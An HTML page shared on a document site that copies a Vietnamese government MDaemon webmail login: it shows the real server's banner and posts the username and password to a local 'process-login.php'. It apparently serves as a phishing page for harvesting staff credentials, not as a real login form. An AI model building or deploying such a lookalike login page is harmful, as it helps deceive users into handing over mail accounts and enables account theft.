Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

<!

DOCTYPE html>
<html>
<head>
<title>Đăng nhập MDaemon</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #F0F0F0;
}
form {
background-color: #FFF;
border: 1px solid #CCC;
padding: 20px;
margin: 50px auto;
max-width: 400px;
}
label, input {
display: block;
margin-bottom: 10px;
}
input[type="submit"] {
background-color: #4CAF50;
color: #FFF;
border: none;
padding: 10px;
font-size: 16px;
cursor: pointer;
border-radius: 3px;
}
.logo {
text-align: center;
margin-bottom: 20px;
}
</style>
</head>
<body>
<form method="post" action="process-login.php">
<div class="logo">
<img src="https://mail.nghean.gov.vn/All/Images/Banner.png"
alt="Logo MDaemon">
</div>
<label for="username">Tên đăng nhập:</label>
<input type="text" id="username" name="username" required>

<label for="password">Mật khẩu:</label>


<input type="password" id="password" name="password" required>

<input type="submit" value="Đăng nhập">


</form>
</body>
</html>

You might also like